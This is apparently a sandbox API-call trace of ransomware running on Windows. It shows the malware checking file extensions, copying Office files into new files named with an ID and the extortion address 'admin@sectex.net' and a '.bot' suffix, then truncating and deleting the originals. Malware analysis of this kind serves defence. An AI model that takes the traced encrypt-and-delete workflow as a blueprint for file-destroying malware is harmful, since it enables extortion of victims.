	[0150.127] lstrlenW (lpString=".dbf") returned 4
	[0150.127] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
	[0150.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.REST.IDX_DLL") returned 67
	[0150.128] lstrlenW (lpString=".1cd") returned 4
	[0150.128] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0150.128] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PPINTL.REST.IDX_DLL") returned 67
	[0150.128] lstrlenW (lpString=".jpg") returned 4
	[0150.128] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0150.128] lstrcmpiW (lpString1=".IDX_DLL", lpString2=".bot") returned 1
	[0150.128] lstrlenW (lpString="PUBWZINT.REST.IDX_DLL") returned 21
	[0150.128] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBWZINT.REST.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubwzint.rest.idx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0150.138] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=173952) returned 1
	[0150.138] CloseHandle (hObject=0x3f0) returned 1
	[0150.138] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBWZINT.REST.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubwzint.rest.idx_dll")) returned 0x20
	[0150.181] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBWZINT.REST.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubwzint.rest.idx_dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0150.182] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBWZINT.REST.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubwzint.rest.idx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec
	[0150.192] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.192] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.192] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBWZINT.REST.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubwzint.rest.idx_dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0150.202] GetLastError () returned 0x0
	[0150.202] ReadFile (in: hFile=0x3ec, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x2a780, lpOverlapped=0x0) returned 1
	[0150.207] WriteFile (in: hFile=0x2a0, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x2a790, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x2a790, lpOverlapped=0x0) returned 1
	[0150.210] ReadFile (in: hFile=0x3ec, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0150.210] WriteFile (in: hFile=0x2a0, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xfe, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xfe, lpOverlapped=0x0) returned 1
	[0150.210] SetEndOfFile (hFile=0x2a0) returned 1
	[0150.211] CloseHandle (hObject=0x2a0) returned 1
	[0150.211] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.211] SetEndOfFile (hFile=0x3ec) returned 1
	[0150.215] CloseHandle (hObject=0x3ec) returned 1
	[0150.217] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBWZINT.REST.IDX_DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0150.218] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBWZINT.REST.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubwzint.rest.idx_dll")) returned 1
	[0150.218] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBWZINT.REST.IDX_DLL") returned 69
	[0150.218] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBWZINT.REST.IDX_DLL") returned 69
	[0150.218] lstrlenW (lpString=".doc") returned 4
	[0150.218] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0150.218] lstrlenW (lpString=".docx") returned 5
	[0150.218] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0150.218] lstrlenW (lpString=".pdf") returned 4
	[0150.218] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0150.218] lstrlenW (lpString=".xls") returned 4
	[0150.219] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0150.219] lstrlenW (lpString=".xlsx") returned 5
	[0150.219] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0150.219] lstrlenW (lpString=".ppt") returned 4
	[0150.219] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0150.219] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBWZINT.REST.IDX_DLL") returned 69
	[0150.219] lstrlenW (lpString=".zip") returned 4
	[0150.219] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0150.219] lstrlenW (lpString=".rar") returned 4
	[0150.219] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0150.219] lstrlenW (lpString=".bz2") returned 4
	[0150.219] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0150.219] lstrlenW (lpString=".7z") returned 3
	[0150.219] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0150.219] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBWZINT.REST.IDX_DLL") returned 69
	[0150.219] lstrlenW (lpString=".dbf") returned 4
	[0150.219] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
	[0150.219] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBWZINT.REST.IDX_DLL") returned 69
	[0150.219] lstrlenW (lpString=".1cd") returned 4
	[0150.219] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0150.219] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBWZINT.REST.IDX_DLL") returned 69
	[0150.219] lstrlenW (lpString=".jpg") returned 4
	[0150.219] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0150.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBWZINT.REST.IDX_DLL") returned 69
	[0150.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBWZINT.REST.IDX_DLL") returned 69
	[0150.547] lstrlenW (lpString=".doc") returned 4
	[0150.547] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0150.547] lstrlenW (lpString=".docx") returned 5
	[0150.547] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0150.547] lstrlenW (lpString=".pdf") returned 4
	[0150.547] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0150.548] lstrlenW (lpString=".xls") returned 4
	[0150.548] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0150.548] lstrlenW (lpString=".xlsx") returned 5
	[0150.548] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0150.548] lstrlenW (lpString=".ppt") returned 4
	[0150.548] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0150.548] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBWZINT.REST.IDX_DLL") returned 69
	[0150.548] lstrlenW (lpString=".zip") returned 4
	[0150.548] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0150.548] lstrlenW (lpString=".rar") returned 4
	[0150.548] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0150.548] lstrlenW (lpString=".bz2") returned 4
	[0150.548] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0150.548] lstrlenW (lpString=".7z") returned 3
	[0150.548] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0150.548] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBWZINT.REST.IDX_DLL") returned 69
	[0150.548] lstrlenW (lpString=".dbf") returned 4
	[0150.548] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
	[0150.548] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBWZINT.REST.IDX_DLL") returned 69
	[0150.548] lstrlenW (lpString=".1cd") returned 4
	[0150.548] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0150.548] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBWZINT.REST.IDX_DLL") returned 69
	[0150.548] lstrlenW (lpString=".jpg") returned 4
	[0150.548] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0150.548] lstrcmpiW (lpString1=".VSL", lpString2=".bot") returned 1
	[0150.548] lstrlenW (lpString="TIMESOLN.VSL") returned 12
	[0150.548] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\TIMESOLN.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\timesoln.vsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0150.865] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=281448) returned 1
	[0150.865] CloseHandle (hObject=0x3b0) returned 1
	[0150.867] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\TIMESOLN.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\timesoln.vsl")) returned 0x20
	[0150.867] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\TIMESOLN.VSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\timesoln.vsl.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0150.867] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\TIMESOLN.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\timesoln.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0150.867] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.867] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.867] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\TIMESOLN.VSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\timesoln.vsl.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0150.906] GetLastError () returned 0x0
	[0150.906] ReadFile (in: hFile=0x3b0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x44b68, lpOverlapped=0x0) returned 1
	[0150.965] WriteFile (in: hFile=0x38c, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x44b70, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x44b70, lpOverlapped=0x0) returned 1
	[0150.972] ReadFile (in: hFile=0x3b0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0150.972] WriteFile (in: hFile=0x38c, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0150.972] SetEndOfFile (hFile=0x38c) returned 1
	[0150.975] CloseHandle (hObject=0x38c) returned 1
	[0150.976] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.976] SetEndOfFile (hFile=0x3b0) returned 1
	[0150.983] CloseHandle (hObject=0x3b0) returned 1
	[0150.983] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\TIMESOLN.VSL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0150.989] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\TIMESOLN.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\timesoln.vsl")) returned 1
	[0151.025] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\TIMESOLN.VSL") returned 60
	[0151.025] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\TIMESOLN.VSL") returned 60
	[0151.025] lstrlenW (lpString=".doc") returned 4
	[0151.025] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1
	[0151.025] lstrlenW (lpString=".docx") returned 5
	[0151.025] lstrcmpiW (lpString1=".docx", lpString2="N.VSL") returned -1
	[0151.025] lstrlenW (lpString=".pdf") returned 4
	[0151.025] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1
	[0151.025] lstrlenW (lpString=".xls") returned 4
	[0151.025] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1
	[0151.034] lstrlenW (lpString=".xlsx") returned 5
	[0151.037] lstrcmpiW (lpString1=".xlsx", lpString2="N.VSL") returned -1
	[0151.037] lstrlenW (lpString=".ppt") returned 4
	[0151.037] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1
	[0151.037] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\TIMESOLN.VSL") returned 60
	[0151.037] lstrlenW (lpString=".zip") returned 4
	[0151.037] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1
	[0151.037] lstrlenW (lpString=".rar") returned 4
	[0151.037] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1
	[0151.037] lstrlenW (lpString=".bz2") returned 4
	[0151.037] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1
	[0151.046] lstrlenW (lpString=".7z") returned 3
	[0151.046] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1
	[0151.046] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\TIMESOLN.VSL") returned 60
	[0151.046] lstrlenW (lpString=".dbf") returned 4
	[0151.046] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1
	[0151.046] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\TIMESOLN.VSL") returned 60
	[0151.046] lstrlenW (lpString=".1cd") returned 4
	[0151.047] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1
	[0151.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\TIMESOLN.VSL") returned 60
	[0151.047] lstrlenW (lpString=".jpg") returned 4
	[0151.047] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1
	[0151.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\TIMESOLN.VSL") returned 60
	[0151.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\TIMESOLN.VSL") returned 60
	[0151.047] lstrlenW (lpString=".doc") returned 4
	[0151.047] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1
	[0151.047] lstrlenW (lpString=".docx") returned 5
	[0151.047] lstrcmpiW (lpString1=".docx", lpString2="N.VSL") returned -1
	[0151.047] lstrlenW (lpString=".pdf") returned 4
	[0151.047] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1
	[0151.047] lstrlenW (lpString=".xls") returned 4
	[0151.047] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1
	[0151.047] lstrlenW (lpString=".xlsx") returned 5
	[0151.047] lstrcmpiW (lpString1=".xlsx", lpString2="N.VSL") returned -1
	[0151.047] lstrlenW (lpString=".ppt") returned 4
	[0151.047] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1
	[0151.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\TIMESOLN.VSL") returned 60
	[0151.047] lstrlenW (lpString=".zip") returned 4
	[0151.047] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1
	[0151.047] lstrlenW (lpString=".rar") returned 4
	[0151.047] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1
	[0151.047] lstrlenW (lpString=".bz2") returned 4
	[0151.047] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1
	[0151.047] lstrlenW (lpString=".7z") returned 3
	[0151.047] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1
	[0151.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\TIMESOLN.VSL") returned 60
	[0151.047] lstrlenW (lpString=".dbf") returned 4
	[0151.047] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1
	[0151.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\TIMESOLN.VSL") returned 60
	[0151.047] lstrlenW (lpString=".1cd") returned 4
	[0151.048] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1
	[0151.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\TIMESOLN.VSL") returned 60
	[0151.048] lstrlenW (lpString=".jpg") returned 4
	[0151.048] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1
	[0151.048] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0151.048] lstrlenW (lpString="VISBRRES.DLL") returned 12
	[0151.048] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISBRRES.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visbrres.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8
	[0152.685] GetFileSizeEx (in: hFile=0x3f8, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=37264) returned 1
	[0152.685] CloseHandle (hObject=0x3f8) returned 1
	[0152.685] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISBRRES.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visbrres.dll")) returned 0x20
	[0152.685] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISBRRES.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visbrres.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0152.685] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISBRRES.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visbrres.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0152.685] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISBRRES.DLL") returned 60
	[0152.685] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISBRRES.DLL") returned 60
	[0152.685] lstrlenW (lpString=".doc") returned 4
	[0152.685] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0152.685] lstrlenW (lpString=".docx") returned 5
	[0152.686] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1
	[0152.686] lstrlenW (lpString=".pdf") returned 4
	[0152.686] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0152.686] lstrlenW (lpString=".xls") returned 4
	[0152.686] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0152.686] lstrlenW (lpString=".xlsx") returned 5
	[0152.686] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1
	[0152.686] lstrlenW (lpString=".ppt") returned 4
	[0152.686] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0152.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISBRRES.DLL") returned 60
	[0152.686] lstrlenW (lpString=".zip") returned 4
	[0152.686] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0152.686] lstrlenW (lpString=".rar") returned 4
	[0152.686] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0152.686] lstrlenW (lpString=".bz2") returned 4
	[0152.686] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0152.686] lstrlenW (lpString=".7z") returned 3
	[0152.686] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0152.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISBRRES.DLL") returned 60
	[0152.686] lstrlenW (lpString=".dbf") returned 4
	[0152.686] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0152.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISBRRES.DLL") returned 60
	[0152.686] lstrlenW (lpString=".1cd") returned 4
	[0152.686] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0152.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISBRRES.DLL") returned 60
	[0152.686] lstrlenW (lpString=".jpg") returned 4
	[0152.686] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0152.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISBRRES.DLL") returned 60
	[0152.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISBRRES.DLL") returned 60
	[0152.686] lstrlenW (lpString=".doc") returned 4
	[0152.686] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0152.687] lstrlenW (lpString=".docx") returned 5
	[0152.687] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1
	[0152.687] lstrlenW (lpString=".pdf") returned 4
	[0152.687] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0152.687] lstrlenW (lpString=".xls") returned 4
	[0152.687] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0152.687] lstrlenW (lpString=".xlsx") returned 5
	[0152.687] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1
	[0152.687] lstrlenW (lpString=".ppt") returned 4
	[0152.687] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0152.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISBRRES.DLL") returned 60
	[0152.687] lstrlenW (lpString=".zip") returned 4
	[0152.687] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0152.687] lstrlenW (lpString=".rar") returned 4
	[0152.687] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0152.687] lstrlenW (lpString=".bz2") returned 4
	[0152.687] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0152.687] lstrlenW (lpString=".7z") returned 3
	[0152.687] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0152.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISBRRES.DLL") returned 60
	[0152.687] lstrlenW (lpString=".dbf") returned 4
	[0152.687] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0152.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISBRRES.DLL") returned 60
	[0152.687] lstrlenW (lpString=".1cd") returned 4
	[0152.687] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0152.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISBRRES.DLL") returned 60
	[0152.687] lstrlenW (lpString=".jpg") returned 4
	[0152.687] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0152.688] lstrcmpiW (lpString1=".HXS", lpString2=".bot") returned 1
	[0152.688] lstrlenW (lpString="VISIO.DEV.HXS") returned 13
	[0152.688] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.dev.hxs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8
	[0152.688] GetFileSizeEx (in: hFile=0x3f8, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=5802528) returned 1
	[0152.688] CloseHandle (hObject=0x3f8) returned 1
	[0152.688] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.dev.hxs")) returned 0x20
	[0152.688] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.dev.hxs.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0152.688] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.dev.hxs"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.dev.hxs.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0152.689] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV.HXS") returned 61
	[0152.689] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV.HXS") returned 61
	[0152.689] lstrlenW (lpString=".doc") returned 4
	[0152.689] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0152.689] lstrlenW (lpString=".docx") returned 5
	[0152.689] lstrcmpiW (lpString1=".docx", lpString2="V.HXS") returned -1
	[0152.689] lstrlenW (lpString=".pdf") returned 4
	[0152.689] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0152.689] lstrlenW (lpString=".xls") returned 4
	[0152.689] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0152.689] lstrlenW (lpString=".xlsx") returned 5
	[0152.689] lstrcmpiW (lpString1=".xlsx", lpString2="V.HXS") returned -1
	[0152.689] lstrlenW (lpString=".ppt") returned 4
	[0152.689] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
